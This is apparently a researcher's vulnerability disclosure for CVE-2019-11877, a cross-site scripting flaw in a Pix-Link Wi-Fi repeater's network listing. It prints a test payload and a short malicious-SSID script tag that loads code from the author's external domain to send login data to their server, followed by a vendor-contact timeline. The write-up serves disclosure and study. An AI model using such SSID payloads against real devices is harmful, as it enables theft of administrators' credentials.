[CVE-2019–11877] Credentials Stealing Through XSS on Pix-Link Repeater
I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”
When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.
I used my smartphone to create a wifi network named
<script>alert(‘XSS’)</script>
And did the test:
Now it’s time to make a real attack.
The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:
http://ilrg.xyz/
I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:
Now I just need to go to the settings page of the repeater and scan for available networks.
It will run the XSS and send the data to a file on my server.
With this we have a POC!
Sources that served as inspiration:
http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf
https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120
https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/
Timeline:
28/04/2019 — First email sent to the vendor (no answer)
06/05/2019 — Second email sent to the vendor (no answer)
15/05/2019 — Third email sent to the vendor (no answer)
27/05/2019 — Disclosure